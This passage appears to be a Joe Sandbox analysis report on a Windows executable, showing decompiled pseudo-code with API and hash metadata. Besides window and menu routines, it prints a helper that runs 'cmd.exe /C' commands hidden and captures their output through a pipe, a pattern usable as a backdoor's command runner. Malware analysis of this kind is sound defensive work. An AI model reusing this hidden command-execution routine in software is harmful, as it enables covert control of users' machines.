				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x456ec6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x49de28; // 0x422f40
					E00406A70(_t294,  &_v12);
					E0040D144(_v12, 1);
					E00404378();
				}
				_t149 =  *0x49ebb8; // 0x0
				E0045B100(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x456ea9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x456db0);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DE8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x49ebbc; // 0x0
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00455B08(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E00441704(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E00441704(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E00451750(E00441704(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E00441704(_v8), 0);
								} else {
									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043EC5C(_v8);
						}
					} else {
						_push(_t372);
						_push(0x456a14);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DE8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004581F4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E004581E8() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x49ebb8; // 0x0
								_t305 = E0043A980( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x49ebb8; // 0x0
								_t248 = E0043A9C4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00454DB8(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00458224() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00458218() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x49ebb8; // 0x0
										_t311 = E0043A980( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x49ebb8; // 0x0
										_t269 = E0043A9C4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x49ebb8; // 0x0
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44ff0c; // 0x44ff58
									_t290 = E00403D78( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004581F4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E004581E8() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00454DB8(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
								E0043B1DC();
							} else {
								_t231 = E00441704(_v8);
								_t232 =  *0x49ebb8; // 0x0
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E00441704(_v8), 3);
							}
							_t226 =  *0x49ebb8; // 0x0
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x456eb0);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}


























































                                                    0x0045695d
                                                    0x0045695f
                                                    0x00456967
                                                    0x0045696a
                                                    0x0045696f
                                                    0x00456970
                                                    0x00456975
                                                    0x00456978
                                                    0x00456982
                                                    0x00456993
                                                    0x00456998
                                                    0x004569a7
                                                    0x004569ac
                                                    0x004569ac
                                                    0x004569b1
                                                    0x004569b6
                                                    0x004569be
                                                    0x004569c7
                                                    0x004569c8
                                                    0x004569cd
                                                    0x004569d0
                                                    0x004569da
                                                    0x004569e0
                                                    0x004569e3
                                                    0x004569ea
                                                    0x00456d8e
                                                    0x00456d8f
                                                    0x00456d94
                                                    0x00456d97
                                                    0x00456da1
                                                    0x00456dab
                                                    0x00456dc7
                                                    0x00456dcf
                                                    0x00456dd2
                                                    0x00456dd4
                                                    0x00456dd9
                                                    0x00456dd9
                                                    0x00456dde
                                                    0x00456de1
                                                    0x00456de8
                                                    0x00456df7
                                                    0x00456dfa
                                                    0x00456e01
                                                    0x00456e22
                                                    0x00456e27
                                                    0x00456e2e
                                                    0x00456e33
                                                    0x00456e35
                                                    0x00456e40
                                                    0x00456e45
                                                    0x00456e47
                                                    0x00456e56
                                                    0x00456e56
                                                    0x00456e47
                                                    0x00456e58
                                                    0x00456e5a
                                                    0x00456e8c
                                                    0x00456e5c
                                                    0x00456e74
                                                    0x00456e7a
                                                    0x00456e7a
                                                    0x00456e03
                                                    0x00456e1b
                                                    0x00456e1b
                                                    0x00456dea
                                                    0x00456ded
                                                    0x00456ded
                                                    0x004569f0
                                                    0x004569f2
                                                    0x004569f3
                                                    0x004569f8
                                                    0x004569fb
                                                    0x00456a05
                                                    0x00456a0f
                                                    0x00456a35
                                                    0x00456a61
                                                    0x00456aaa
                                                    0x00456aaa
                                                    0x00456aad
                                                    0x00456aaf
                                                    0x00456ab1
                                                    0x00456ab1
                                                    0x00456ac1
                                                    0x00456ac1
                                                    0x00456ac4
                                                    0x00456ac6
                                                    0x00456ac8
                                                    0x00456ac8
                                                    0x00456a63
                                                    0x00456a63
                                                    0x00456a75
                                                    0x00456a78
                                                    0x00456a7a
                                                    0x00456a7c
                                                    0x00456a7c
                                                    0x00456a7f
                                                    0x00456a8f
                                                    0x00456a92
                                                    0x00456a94
                                                    0x00456a96
                                                    0x00456a96
                                                    0x00456a94
                                                    0x00456acd
                                                    0x00456acf
                                                    0x00456acf
                                                    0x00456ad3
                                                    0x00456ad5
                                                    0x00456ad5
                                                    0x00456ae5
                                                    0x00456aee
                                                    0x00456afb
                                                    0x00456b04
                                                    0x00456b04
                                                    0x00456b0e
                                                    0x00456b11
                                                    0x00456b1c
                                                    0x00456b1f
                                                    0x00456bf3
                                                    0x00456bf5
                                                    0x00456bfb
                                                    0x00456bfe
                                                    0x00456c05
                                                    0x00456c4e
                                                    0x00456c4e
                                                    0x00456c51
                                                    0x00456c53
                                                    0x00456c55
                                                    0x00456c55
                                                    0x00456c65
                                                    0x00456c65
                                                    0x00456c68
                                                    0x00456c6a
                                                    0x00456c6c
                                                    0x00456c6c
                                                    0x00456c07
                                                    0x00456c07
                                                    0x00456c19
                                                    0x00456c19
                                                    0x00456c1c
                                                    0x00456c1e
                                                    0x00456c20
                                                    0x00456c20
                                                    0x00456c23
                                                    0x00456c33
                                                    0x00456c33
                                                    0x00456c36
                                                    0x00456c38
                                                    0x00456c3a
                                                    0x00456c3a
                                                    0x00456c38
                                                    0x00456c6f
                                                    0x00456c71
                                                    0x00456c73
                                                    0x00456c73
                                                    0x00456c73
                                                    0x00456c75
                                                    0x00456c77
                                                    0x00456c79
                                                    0x00456c79
                                                    0x00456c79
                                                    0x00456c92
                                                    0x00456c92
                                                    0x00456b25
                                                    0x00456b25
                                                    0x00456b2a
                                                    0x00456b2d
                                                    0x00456b30
                                                    0x00456b37
                                                    0x00456b3f
                                                    0x00456b45
                                                    0x00456b4a
                                                    0x00456b4c
                                                    0x00456b51
                                                    0x00456b51
                                                    0x00456b4c
                                                    0x00456b54
                                                    0x00456b56
                                                    0x00456b8f
                                                    0x00456b8f
                                                    0x00456b92
                                                    0x00456b94
                                                    0x00456b96
                                                    0x00456b96
                                                    0x00456ba6
                                                    0x00456ba6
                                                    0x00456ba9
                                                    0x00456bab
                                                    0x00456bad
                                                    0x00456bad
                                                    0x00456b58
                                                    0x00456b5e
                                                    0x00456b5e
                                                    0x00456b61
                                                    0x00456b63
                                                    0x00456b65
                                                    0x00456b65
                                                    0x00456b68
                                                    0x00456b71
                                                    0x00456b71
                                                    0x00456b74
                                                    0x00456b76
                                                    0x00456b78
                                                    0x00456b78
                                                    0x00456b7b
                                                    0x00456b7b
                                                    0x00456bb0
                                                    0x00456bb2
                                                    0x00456bb4
                                                    0x00456bb4
                                                    0x00456bb4
                                                    0x00456bb6
                                                    0x00456bb8
                                                    0x00456bba
                                                    0x00456bba
                                                    0x00456bba
                                                    0x00456bca
                                                    0x00456bd3
                                                    0x00456bd9
                                                    0x00456bdc
                                                    0x00456be0
                                                    0x00456be9
                                                    0x00456be9
                                                    0x00456be0
                                                    0x00456b1f
                                                    0x00456c9b
                                                    0x00456cac
                                                    0x00456d82
                                                    0x00456cb2
                                                    0x00456cbc
                                                    0x00456d0f
                                                    0x00456d23
                                                    0x00456d23
                                                    0x00456d38
                                                    0x00456d40
                                                    0x00456cbe
                                                    0x00456cc3
                                                    0x00456cce
                                                    0x00456cdd
                                                    0x00456ced
                                                    0x00456ced
                                                    0x00456d4e
                                                    0x00456d5d
                                                    0x00456d5d
                                                    0x00456cac
                                                    0x004569ea
                                                    0x00456e93
                                                    0x00456e96
                                                    0x00456e99
                                                    0x00456e9e
                                                    0x00456ea1
                                                    0x00456ea8

                                                    APIs
                                                    • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00456CDD
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LoadMessageSendString
                                                    • String ID: @/B
                                                    • API String ID: 1946433856-85281795
                                                    • Opcode ID: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                    • Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
                                                    • Opcode Fuzzy Hash: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                    • Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00475384 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158processfilesynchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 38%
                                                    			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				long _v24;
				char _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				struct _STARTUPINFOA _v108;
				struct _PROCESS_INFORMATION _v124;
				char _v380;
				char _v384;
				char _v388;
				CHAR* _t77;
				void* _t112;
				intOrPtr _t125;
				intOrPtr _t126;
				void* _t131;
				void* _t133;
				void* _t134;
				intOrPtr _t135;

				_t133 = _t134;
				_t135 = _t134 + 0xfffffe80;
				_v388 = 0;
				_v384 = 0;
				_v28 = 0;
				_t131 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t133);
				_push(0x4755bb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004049C0(__ecx);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 0xffffffff;
				_v40.lpSecurityDescriptor = 0;
				CreatePipe( &_v16,  &_v20,  &_v40, 0);
				_push(_t133);
				_push(0x475581);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004032B4( &_v108, 0x44);
				_v108.cb = 0x44;
				_v108.dwFlags = 0x101;
				_v108.wShowWindow = 0;
				_v108.hStdInput = GetStdHandle(0xfffffff6);
				_v108.hStdOutput = _v20;
				_v108.hStdError = _v20;
				if(E00409A58(_v12) == 0) {
					E00404A58( &_v28, 0x4755d0);
				} else {
					E00404A58( &_v28, _v12);
				}
				_t77 = E00404E80(_v28);
				E00404CCC( &_v384, _v8, "cmd.exe /C ");
				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
				asm("sbb ebx, ebx");
				_t112 = 1;
				CloseHandle(_v20);
				if(1 == 0) {
					_pop(_t125);
					 *[fs:eax] = _t125;
					_push(0x475588);
					return CloseHandle(_v16);
				} else {
					_push(_t133);
					_push(0x475563);
					_push( *[fs:eax]);
					 *[fs:eax] = _t135;
					do {
						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
						asm("sbb ebx, ebx");
						_t112 = _t112 + 1;
						if(_v24 > 0) {
							 *((char*)(_t133 + _v24 - 0x178)) = 0;
							OemToCharA( &_v380,  &_v380);
							E00404C30( &_v388, 0x100,  &_v380);
							E00404C88(_t131, _v388);
						}
					} while (_t112 != 0 && _v24 != 0);
					WaitForSingleObject(_v124.hProcess, 0xffffffff);
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x47556a);
					CloseHandle(_v124.hThread);
					return CloseHandle(_v124);
				}
			}























                                                    0x00475385
                                                    0x00475387
                                                    0x00475391
                                                    0x00475397
                                                    0x0047539d
                                                    0x004753a0
                                                    0x004753a2
                                                    0x004753a5
                                                    0x004753ab
                                                    0x004753b3
                                                    0x004753ba
                                                    0x004753bb
                                                    0x004753c0
                                                    0x004753c3
                                                    0x004753c8
                                                    0x004753cd
                                                    0x004753d4
                                                    0x004753dd
                                                    0x004753ee
                                                    0x004753f5
                                                    0x004753f6
                                                    0x004753fb
                                                    0x004753fe
                                                    0x0047540b
                                                    0x00475410
                                                    0x00475417
                                                    0x0047541e
                                                    0x0047542b
                                                    0x00475431
                                                    0x00475437
                                                    0x00475444
                                                    0x0047545b
                                                    0x00475446
                                                    0x0047544c
                                                    0x0047544c
                                                    0x0047546b
                                                    0x00475489
                                                    0x0047549c
                                                    0x004754a4
                                                    0x004754a6
                                                    0x004754ab
                                                    0x004754b2
                                                    0x0047556c
                                                    0x0047556f
                                                    0x00475572
                                                    0x00475580
                                                    0x004754b8
                                                    0x004754ba
                                                    0x004754bb
                                                    0x004754c0
                                                    0x004754c3
                                                    0x004754c6
                                                    0x004754dc
                                                    0x004754e4
                                                    0x004754e6
                                                    0x004754eb
                                                    0x004754f0
                                                    0x00475506
                                                    0x0047551c
                                                    0x00475529
                                                    0x00475529
                                                    0x0047552e
                                                    0x0047553e
                                                    0x00475545
                                                    0x00475548
                                                    0x0047554b
                                                    0x00475554
                                                    0x00475562
                                                    0x00475562

                                                    APIs
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,?,00000000,004755BB), ref: 004753EE
                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,00000000,00475581,?,?,?), ref: 00475426
                                                      • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 0047549C
                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 004754AB
                                                    • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                    • OemToCharA.USER32 ref: 00475506
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                    • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                    • CloseHandle.KERNEL32(?,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                    • String ID: C:\$D$cmd.exe /C
                                                    • API String ID: 3269375759-2807548070
                                                    • Opcode ID: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                    • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                    • Opcode Fuzzy Hash: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                    • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044EA40 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405nativeCOMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44ef73);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0044DDEC(E0041AC6C(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E0041AC6C(_v8, _t368);
									_t295 = _v17;
									_v16 = E0044DD30(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E0041AC6C(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E0044DD30(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0044E630(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E0041AC6C(_v8, _t370);
								_t181 = E0044DDD0( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0044DD30(E0041AC6C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0042572C(0, 1);
								_push(_t377);
								_push(0x44eda6);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x44ed89);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E00425CE8(_v24,  *(_v40 + 0x18));
								E00425B88(_v24);
								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
